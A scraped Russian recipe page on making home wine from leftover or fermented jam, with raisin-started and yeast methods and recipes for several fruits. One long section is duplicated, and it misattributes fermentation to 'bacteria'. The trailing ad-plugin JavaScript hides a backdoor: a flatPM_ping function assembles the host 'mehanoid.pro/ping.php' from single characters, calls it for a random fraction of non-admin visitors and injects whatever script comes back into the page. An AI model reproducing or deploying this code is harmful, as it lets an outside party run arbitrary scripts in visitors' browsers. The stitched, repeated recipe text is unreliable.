Вино из варенья

Домашнее вино из старого варенья

Каждый год у запасливых хозяек остается минимум несколько банок прошлогоднего варенья. Кушать его уже не хочется, так как заготовлено новое, а выбрасывать натуральный продукт, на приготовление которого потрачены силы и средства, жалко. Предлагаю следующий выход – сделать домашнее вино из варенья. Рецепт и технологию мы рассмотрим дальше.

Заранее советую найти трехлитровую банку, капроновую крышку, марлю и медицинскую резиновую перчатку (вместо нее можно установить гидрозатвор). В этом рецепте обойдемся без дрожжей, поскольку винные достать сложно, а обычные прессованные или сухие в виноделии не используются, превращая вино в обычную брагу. Роль дрожжей выполнит изюм, на поверхности которого живут нужные грибки.

Для приготовления домашнего вина подходит варенье из яблок, смородины, малины, клубники, сливы, вишни и других плодовых культур. Но не советую смешивать разные виды варенья в одном напитке: в смеси теряется уникальный вкус каждой ягоды. Лучше сделать несколько отдельных порций.

Ингредиенты:

  • варенье – 1 литр;
  • вода – 1 литр;
  • немытый изюм – 100 грамм;
  • сахар – 10-100 грамм на литр воды (не обязательно).

Количество воды зависит от содержания сахара в варенье (естественного в сырье и добавленного в процессе варки). Нужно стремиться, чтобы содержание сахара в сусле не превышало 20%. При необходимости разбавляйте водой сильнее. Если же изначально варенье не сладкое, можно добавить больше сахара.

Рецепт вина из старого варенья

1. Помыть трехлитровую банку содой, несколько раз сполоснуть теплой водой, затем простерилизовать, влив немного кипятка. Это убьет патогенные микроорганизмы, которые могут испортить вино.

2. Переложить варенье в банку, добавить воду и сахар (если нужно), засыпать немытый изюм. Перемешать до получения однородной массы. Вместо изюма можно использовать любые немытые свежие ягоды, которые нужно предварительно раздавить.

Авторы некоторых рецептов советуют добавлять к изюму горстку риса. Но рис не способствует брожению, это бесполезная затея.

3. Банку накрыть марлей для защиты от мух, перенести в теплое (18-25°C) темное место или накрыть плотной тканью. Оставить на 5 дней, раз в сутки перемешивать чистой рукой или деревянным приспособлением. Через 8-20 часов должны появиться признаки брожения: шипение, пена и легкий запах кислого. Это значит, что всё идет нормально.

4. Убрать с поверхности мезгу (всплывшую мякоть), процедить содержимое банки через марлю, сложенную в несколько слоев. Отфильтрованное сусло перелить в чистую банку, предварительно вымытую содой и кипятком. Емкость можно заполнять максимум на 75% объема, чтобы осталось место для пены и углекислого газа, которые появятся при брожении.

5. В одном из пальцев медицинской перчатки сделать иголкой дырочку, после чего надеть саму перчатку на горлышко банки. Чтобы конструкция лучше держалась и не слетела при брожении, обвязать горлышко веревкой поверх перчатки.

Брожение под перчаткой

Альтернативный способ – установить гидрозатвор. Разницы между этими двумя вариантами нет. Если делаете домашние вина постоянно, лучше соорудить гидрозатвор, он универсален, в остальных случаях подойдет перчатка (каждый раз новая).

6. Поставить банку на 30-60 дней в темное теплое место. Брожение закончится, когда надувшаяся перчатка полностью сдуется или гидрозатвор не будет пускать пузыри несколько дней. Само вино должно стать светлее, а на дне появится осадок.

Внимание! Если брожение не прекращается через 50 дней с момента установки гидрозатвора, вареньевое вино нужно слить, не задевая осадок на дне. Затем снова поставить под гидрозатвор дображивать. Если этого не сделать, напиток может горчить.

7. Перебродившее молодое вино слить с осадка. Попробовать на вкус, по желанию добавить сахара для сладости или водки (спирта) для повышения крепости (2-15% от объема). Крепленое вино из варенья лучше хранится, но не такое ароматное и имеет более жесткий вкус.

Перелить напиток в чистые емкости, желательно наполнять по горлышко, чтобы не было контакта с кислородом. Плотно закрыть, перенести в подвал или холодильник. Выдерживать минимум 2-3 месяца (желательно 5-6). Оптимальная температура – 6-16°C.

Сначала раз в 20-25 дней, потом реже при появлении осадка слоем 2-5 см, фильтровать вино методом переливания в другую емкость. Долгое нахождение на осадке может привести к появлению горечи. Готовый напиток (осадок больше не появляется) можно разлить в бутылки и герметично закрыть пробками.

Крепость приготовленного вина – 10-13%. Срок годности при хранении в подвале или холодильнике – до 3-х лет.

Вино из варенья в домашних условиях, простой рецепт

Если в погребе есть лишняя сладость из фруктов или ягод, то это отличный повод побаловать себя и приготовить вино из варенья в домашних условиях, простой рецепт напитка разберём подробно в текущей статье. Вино может иметь самые различные вкусовые нотки, в зависимости от того какое именно варенье стало его основой. В связи с этим профессионалы не рекомендуют смешивать разное варенье, чтобы напиток не получился неопределённого вкуса.

Особенности приготовления вина

Результатом приготовления станет кисло-сладкий напиток крепостью 10–14 %. При необходимости его можно заправить водкой или спиртом и повысить значение, но тогда это будет уже не вино. Даже без дополнительного крепления вино получается не самым слабым.

Для того чтобы не испортит вкус напитка необходимо ответственно подойти к выбору и подготовке тары. Идеальным вариантом станут стеклянные ёмкости. Если на протяжении всего процесса использовать стекло не получается, то нужно выбрать посуду из материала не окислившегося (эмалированные, нержавеющие). Пластик также использовать нежелательно, так как он вступает в реакцию со спиртами и портит вкус напитка.

Все ёмкости, используемые в процессе приготовления должны быть стерильными. Для этого рекомендуется тщательно почистить все с пищевой содой, а затем простерилизовать на пару. Использовать стерильную тару нужно на всех этапах приготовления как при первичной ферментации, так и при переливании напитка.

Что касается варенья, то можно использовать любое прошлогоднее варенье, которое уже потеряло свой вкус и аромат. Если заготовка уже забродила, то это не станет препятствием чтобы приготовить вино из варенья в домашних условиях, простой рецепт , описанный дальше, позволяет использовать такое сырье. Но если в банке присутствует плесень, то такую сладость нужно немедленно выбросить, она ни в коем случае не подойдёт для виноделия.

Вино из варенья в домашних условиях, рецепты приготовления

Сегодня есть несколько вариантов приготовления напитка из варенья. Несмотря на то что профессионалы не рекомендуют добавлять дрожжи и ускорять процесс, нетерпеливые домашние виноделы прибегают к такому ухищрению. Поэтому будут рассмотрены две технологии приготовления. Первая, классическая, без использования дрожжей, но довольно долгая. Вторая быстрая, но с применением нерекомендованных ингредиентов.

Традиционный способ приготовления

Это способ подходит для тех, кто готов ждать немалый промежуток времени, чтобы в итоге получить качественный вкусный напиток, который можно хранить несколько лет после изготовления. Крепость вина по этому рецепту составляет 10-13 градусов. Сам напиток получается сладким, с лёгкой кислинкой и выраженным вкусом и ароматом ягод или фруктов (в зависимости от исходного сырья).

Ингредиенты:

  • варенье – литровая банка;
  • вода – 1 литр;
  • изюм — 100 гр.

Воду предварительно кипятим и остужаем. Если варенье кислое, то допустимо добавление сахара для большей сладости напитка. Разные виды варенья лучше не смешивать, но если в этом есть необходимость, то лучше совместить сладкую и кислую заготовку, например, смородину и малину.

Вино из варенья в домашних условиях , несмотря на простой рецепт , требует ответственного подхода, иначе можно просто испортить напиток. Изюм можно заменить виноградом, обязательное условие — нельзя мыть ни тот, ни другой. Эти ягоды нужны для активизации процесса брожения за счёт диких дрожжей на поверхности их кожуры. Свежие ягоды перед применением нужно раздавить.

Этапы приготовления

Первый этап приготовления подразумевает подготовку сусла и первичную ферментацию.

  • Соединяем все ингредиенты и тщательно перемешиваем. Если есть необходимость приготовить большее количество напитка, то можно увеличить объем пропорционально указанному составу.
  • Помещаем все в ёмкость для первичного сбраживания и накрываем марлей, чтобы исключить попадание мусора и насекомых. Помещаем тару в тёмное тёплое место, если такого в квартире нет, можно укутать ёмкость плотным покрывалом (важно, исключить попадание света) и поставить около батареи.
  • Первичная ферментация длится 5 дней, первые признаки начала процесса должны проявиться спустя 24 часа. Раз в сутки сусло нужно перемешивать и разбивать корку из мезги, чтобы избежать образования плесени. Лучше использовать деревянную ложку.
  • Через 5 суток сусло процеживают через марлю и выкидывают отжим. Сусло переливают в стерилизованную банку соответствующего объёма. Наполнять ёмкость под завязку не следует, нужно оставить примерно четверть объёма для образования пены в период активного брожения.
  • Банку закрывают гидрозатвором или надевают медицинскую перчатку с проколотым иглой пальцем. Если перчатка висит на горлышке свободно, то нужно укрепить соединение, обвязав скотчем или залепив тестом. Это необходимо чтобы в процессе брожения дать выход углекислому газу, но при этом исключить попадание кислорода в вино.

Спустя не более чем 4 дня перчатка должна быть полностью надута, если это не так значит что-то пошло не по плану либо есть дополнительное отверстие, через которое уходит газ. Если все нормально, то оставляем ёмкость на 3 месяца в тёмном теплом месте.

Процесс активного брожения может занять меньше времени (не менее 1,5 месяца). Об окончании процесса сообщит опавшая перчатки или отсутствие пузырьков в гидрозатворе. Само вино станет прозрачным и выпадет осадок. Если все так, то настало время второго этапа.

  • Прозрачное вино слить с осадка в новую ёмкость. Важно не потревожить муть, её наличие придаёт горечь напитку, поэтому лучше сделать это, используя шланг или капельницу.
  • Пробуем напиток, если кажется, что вино кисловатое, то можно добавить сахар.
  • Разливаем вино по бутылкам, закупориваем и отправляем в холодное место дозревать. Это может быть погреб или холодильник.
  • Дозревать напиток будет около 2–3 месяцев, если в процессе вновь появится осадок, то нужно повторить слив.

В результате получается отличное домашнее вино из варенья, которое не уступает по вкусу любому фруктовому или ягодному напитку.

Ускоренный способ приготовления

Этот способ приготовления займёт у домашнего винодела не более 2 недель.

Потребуются следующие составляющие:

  • варенье – 1 литр;
  • вода – 2 литра;
  • дрожжи, сухие – 10 гр.

Процесс приготовления полностью отличается от предложенного выше.

  • Воду смешать с вареньем и довести до кипения. Снять с огня и охладить.
  • Процедить отвар через марлю, чтобы удалить все кусочки ягод или фруктов.
  • Небольшое количество смеси отлить в чашку и развести в ней дрожжи, выдержать в течение 20 минут в теплом месте для активизации процесса и влить в остальной объем будущего напитка.
  • Выливаем сусло в ёмкость для брожения оставив место для пены и, закрыв гидрозатвором или надев медицинскую перчатку, отправляем на активное брожение в тёмное тёплое место.

Дрожжи активируют и значительно ускоряют процесс сбраживания. Через неделю перчатка уже опадёт, а гидрозатвор перестанет пускать пузыри. Вино даст осадок и его можно будет перелить в чистую тару.

Вино из варенья в домашних условиях, простой рецепт которого содержит дрожжи, получается кисловатым и слегка газированным. К сожалению, долго хранить такое вино не получится, поэтому пить его стоит в ближайшее время.

Вино из варенья в домашних условиях, простой рецепт

Если в погребе есть лишняя сладость из фруктов или ягод, то это отличный повод побаловать себя и приготовить вино из варенья в домашних условиях, простой рецепт напитка разберём подробно в текущей статье. Вино может иметь самые различные вкусовые нотки, в зависимости от того какое именно варенье стало его основой. В связи с этим профессионалы не рекомендуют смешивать разное варенье, чтобы напиток не получился неопределённого вкуса.

Особенности приготовления вина

Результатом приготовления станет кисло-сладкий напиток крепостью 10–14 %. При необходимости его можно заправить водкой или спиртом и повысить значение, но тогда это будет уже не вино. Даже без дополнительного крепления вино получается не самым слабым.

Для того чтобы не испортит вкус напитка необходимо ответственно подойти к выбору и подготовке тары. Идеальным вариантом станут стеклянные ёмкости. Если на протяжении всего процесса использовать стекло не получается, то нужно выбрать посуду из материала не окислившегося (эмалированные, нержавеющие). Пластик также использовать нежелательно, так как он вступает в реакцию со спиртами и портит вкус напитка.

Все ёмкости, используемые в процессе приготовления должны быть стерильными. Для этого рекомендуется тщательно почистить все с пищевой содой, а затем простерилизовать на пару. Использовать стерильную тару нужно на всех этапах приготовления как при первичной ферментации, так и при переливании напитка.

Что касается варенья, то можно использовать любое прошлогоднее варенье, которое уже потеряло свой вкус и аромат. Если заготовка уже забродила, то это не станет препятствием чтобы приготовить вино из варенья в домашних условиях, простой рецепт , описанный дальше, позволяет использовать такое сырье. Но если в банке присутствует плесень, то такую сладость нужно немедленно выбросить, она ни в коем случае не подойдёт для виноделия.

Вино из варенья в домашних условиях, рецепты приготовления

Сегодня есть несколько вариантов приготовления напитка из варенья. Несмотря на то что профессионалы не рекомендуют добавлять дрожжи и ускорять процесс, нетерпеливые домашние виноделы прибегают к такому ухищрению. Поэтому будут рассмотрены две технологии приготовления. Первая, классическая, без использования дрожжей, но довольно долгая. Вторая быстрая, но с применением нерекомендованных ингредиентов.

Традиционный способ приготовления

Это способ подходит для тех, кто готов ждать немалый промежуток времени, чтобы в итоге получить качественный вкусный напиток, который можно хранить несколько лет после изготовления. Крепость вина по этому рецепту составляет 10-13 градусов. Сам напиток получается сладким, с лёгкой кислинкой и выраженным вкусом и ароматом ягод или фруктов (в зависимости от исходного сырья).

Ингредиенты:

  • варенье – литровая банка;
  • вода – 1 литр;
  • изюм — 100 гр.

Воду предварительно кипятим и остужаем. Если варенье кислое, то допустимо добавление сахара для большей сладости напитка. Разные виды варенья лучше не смешивать, но если в этом есть необходимость, то лучше совместить сладкую и кислую заготовку, например, смородину и малину.

Вино из варенья в домашних условиях , несмотря на простой рецепт , требует ответственного подхода, иначе можно просто испортить напиток. Изюм можно заменить виноградом, обязательное условие — нельзя мыть ни тот, ни другой. Эти ягоды нужны для активизации процесса брожения за счёт диких дрожжей на поверхности их кожуры. Свежие ягоды перед применением нужно раздавить.

Этапы приготовления

Первый этап приготовления подразумевает подготовку сусла и первичную ферментацию.

  • Соединяем все ингредиенты и тщательно перемешиваем. Если есть необходимость приготовить большее количество напитка, то можно увеличить объем пропорционально указанному составу.
  • Помещаем все в ёмкость для первичного сбраживания и накрываем марлей, чтобы исключить попадание мусора и насекомых. Помещаем тару в тёмное тёплое место, если такого в квартире нет, можно укутать ёмкость плотным покрывалом (важно, исключить попадание света) и поставить около батареи.
  • Первичная ферментация длится 5 дней, первые признаки начала процесса должны проявиться спустя 24 часа. Раз в сутки сусло нужно перемешивать и разбивать корку из мезги, чтобы избежать образования плесени. Лучше использовать деревянную ложку.
  • Через 5 суток сусло процеживают через марлю и выкидывают отжим. Сусло переливают в стерилизованную банку соответствующего объёма. Наполнять ёмкость под завязку не следует, нужно оставить примерно четверть объёма для образования пены в период активного брожения.
  • Банку закрывают гидрозатвором или надевают медицинскую перчатку с проколотым иглой пальцем. Если перчатка висит на горлышке свободно, то нужно укрепить соединение, обвязав скотчем или залепив тестом. Это необходимо чтобы в процессе брожения дать выход углекислому газу, но при этом исключить попадание кислорода в вино.

Спустя не более чем 4 дня перчатка должна быть полностью надута, если это не так значит что-то пошло не по плану либо есть дополнительное отверстие, через которое уходит газ. Если все нормально, то оставляем ёмкость на 3 месяца в тёмном теплом месте.

Процесс активного брожения может занять меньше времени (не менее 1,5 месяца). Об окончании процесса сообщит опавшая перчатки или отсутствие пузырьков в гидрозатворе. Само вино станет прозрачным и выпадет осадок. Если все так, то настало время второго этапа.

  • Прозрачное вино слить с осадка в новую ёмкость. Важно не потревожить муть, её наличие придаёт горечь напитку, поэтому лучше сделать это, используя шланг или капельницу.
  • Пробуем напиток, если кажется, что вино кисловатое, то можно добавить сахар.
  • Разливаем вино по бутылкам, закупориваем и отправляем в холодное место дозревать. Это может быть погреб или холодильник.
  • Дозревать напиток будет около 2–3 месяцев, если в процессе вновь появится осадок, то нужно повторить слив.

В результате получается отличное домашнее вино из варенья, которое не уступает по вкусу любому фруктовому или ягодному напитку.

Ускоренный способ приготовления

Этот способ приготовления займёт у домашнего винодела не более 2 недель.

Потребуются следующие составляющие:

  • варенье – 1 литр;
  • вода – 2 литра;
  • дрожжи, сухие – 10 гр.

Процесс приготовления полностью отличается от предложенного выше.

  • Воду смешать с вареньем и довести до кипения. Снять с огня и охладить.
  • Процедить отвар через марлю, чтобы удалить все кусочки ягод или фруктов.
  • Небольшое количество смеси отлить в чашку и развести в ней дрожжи, выдержать в течение 20 минут в теплом месте для активизации процесса и влить в остальной объем будущего напитка.
  • Выливаем сусло в ёмкость для брожения оставив место для пены и, закрыв гидрозатвором или надев медицинскую перчатку, отправляем на активное брожение в тёмное тёплое место.

Дрожжи активируют и значительно ускоряют процесс сбраживания. Через неделю перчатка уже опадёт, а гидрозатвор перестанет пускать пузыри. Вино даст осадок и его можно будет перелить в чистую тару.

Вино из варенья в домашних условиях, простой рецепт которого содержит дрожжи, получается кисловатым и слегка газированным. К сожалению, долго хранить такое вино не получится, поэтому пить его стоит в ближайшее время.

Простые рецепты домашнего вина из старого или забродившего варенья

Добавление статьи в новую подборку

Иногда за сезон невозможно съесть все бережно заготовленное варенье. И оно начинает портиться, киснуть. Употреблять в пищу забродившее варенье уже не стоит, но его можно переработать, например, превратив в домашнее вино. Это совсем не сложно!

Приготовление домашнего вина из варенья – процесс довольно простой. Он включает в себя несколько этапов: подготовка сусла, брожение и созревание. Весь процесс занимает от 1 до 4 месяцев. Чем дольше вино настаивается, тем вкуснее оно получается.

Использовать для приготовления вина можно любое старое или прокисшее варенье, но оно должно быть без плесени. Даже малейшее содержание плесневых спор в варенье может испортить вкус готового вина.

Домашнее вино из варенья готовят без добавления дрожжей. Во-первых, специальные винные дрожжи найти не так легко, а обычные хлебопекарные для изготовления домашнего вина не подойдут. А во-вторых, дрожжи часто заменяют на изюм – он отлично справляется с брожением, благодаря содержащимся бактериям. К тому же изюм вовсе не портит вкус готового напитка, а наоборот, раскрывает его фруктово-ягодные нотки. Некоторые виноделы-любители вместо изюма используют обычный рис – с ним домашнее вино получается крепче.

Итак, как же приготовить домашнее вино из прокисшего варенья?

Домашнее вино из малинового варенья

Вино из малинового варенья обладает насыщенным ягодным вкусом и приятным цветом.

Вам понадобятся: 1 л варенья, 2,5 л воды, 150 г винных дрожжей или изюма .

Приготовление. Смешайте варенье и остывшую кипяченую воду в большой стеклянной емкости. Добавьте дрожжи или изюм, но это не обязательно – будущее вино хорошо перебродит и без них. На горлышко наденьте чистую резиновую перчатку и поставьте напиток бродить в темное место с комнатной температурой. Когда надутая от выделяемого при брожении газа перчатка на горлышке опадет, напиток можно процеживать. В среднем процесс брожения занимает 7-15 дней. Аккуратно процедите вино через марлю от мезги и перелейте в чистую емкость. Оставьте на пару дней в темном месте, чтобы выпал осадок. Затем осторожно, чтобы не поднять этот осадок, разлейте вино в бутылки. При желании добавьте еще немного сахара.

Домашнее вино из яблочного варенья

Вино из яблочного варенья будет готово уже через месяц. Оно получается очень ароматным, с интересным фруктовым вкусом.

Вам понадобятся: 1,5 л варенья, 1 стакан сахара, 1,5 л воды и 1 ст.л. изюма .

Приготовление. Воду закипятите и остудите до комнатной температуры. Положите в нее варенье, всыпьте половину стакана сахара, изюм, хорошо все перемешайте и перелейте в большую стеклянную банку. Закройте горлышко резиновой перчаткой, сделав в ней один прокол, и поставьте банку в теплое темное место. Брожение закончится, когда перчатка сдуется, а на поверхности напитка перестанут выделяться пузырьки газа. С помощью дуршлага и марли процедите вино в чистую емкость и удалите мезгу. Старайтесь при этом не “потревожить” образовавшийся на дне банки осадок. Добавьте оставшиеся полстакана сахара, перемешайте и поставьте емкость с вином в прохладное темное место. Через 3-4 недели вино можно пробовать!

Домашнее вино из варенья смородины

Смородиновое вино – это напиток с великолепным цветом, ярким ароматом и насыщенным вкусом спелых ягод.

Вам понадобятся: 1,5 л варенья, 1,5 л воды и 100 г сахара .

Приготовление. В глубокой емкости смешайте варенье с теплой кипяченой водой, добавьте половину или всю порцию сахара (все зависит от личных вкусовых пристрастий), хорошо перемешайте и поставьте в теплое место для брожения. Когда мезга (мякоть из варенья) поднимется на поверхность, брага для вина готова. Процедите ее в чистые простерилизованные банки. При желании добавьте еще сахара и поставьте вино созревать в теплое темное место на 3 месяца. Затем осторожно, с помощью трубки, перелейте его в бутылки, закупорьте и храните в прохладном месте.

Домашнее вино из вишневого варенья

Если добавить в такое вино больше сахара, получится очень вкусный десертный напиток.

Вам понадобятся: 2 л варенья, 2 л воды, 0,5-1 кг сахара и горсть сушеных вишен .

Приготовление. Смешайте варенье, воду и сахар, всыпьте сушеные ягоды вишни. На горлышко емкости со смесью наденьте резиновую перчатку с проделанным в ней маленьким отверстием. Поставьте в темное и теплое место для брожения. Затем напиток процедите, по желанию добавьте еще немного сахара и оставьте уже на 90 дней в затемненном месте. Созревшее вино аккуратно снимите с осадка, разлейте в чистые бутылки и наслаждайтесь его прекрасным вкусом.

Домашнее вино из сливового варенья

Для приготовления вина подойдет даже забродившее варенье. Это нисколько не испортит вкус напитка, наоборот, сделает его более насыщенным.

Вам понадобятся: 1,5 кг варенья, 1,5 литра воды, 1 стакан сахара, 1 ст.л. изюма .

Приготовление. Варенье смешайте с теплой прокипяченной водой, добавьте полстакана сахара и изюм. Перелейте смесь в большую бутыль, на горлышко наденьте специальный затвор или перчатку с проделанной дырочкой и оставьте на пару недель бродить в теплом месте. По окончании брожения вино процедите с помощью марли в чистую емкость, добавьте еще полстакана сахара и поставьте в темное место настаиваться. По истечении 2-3 месяцев выдержанное вино аккуратно перелейте в подготовленные бутылки, используя трубку. Закупорьте пробками и можете приглашать гостей на дегустацию.

Если варенье в вашей кладовке слегка забродило, не спешите его выбрасывать – приготовьте из него домашнее вино и удивите своих домочадцев и гостей необычным вкусным напитком.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};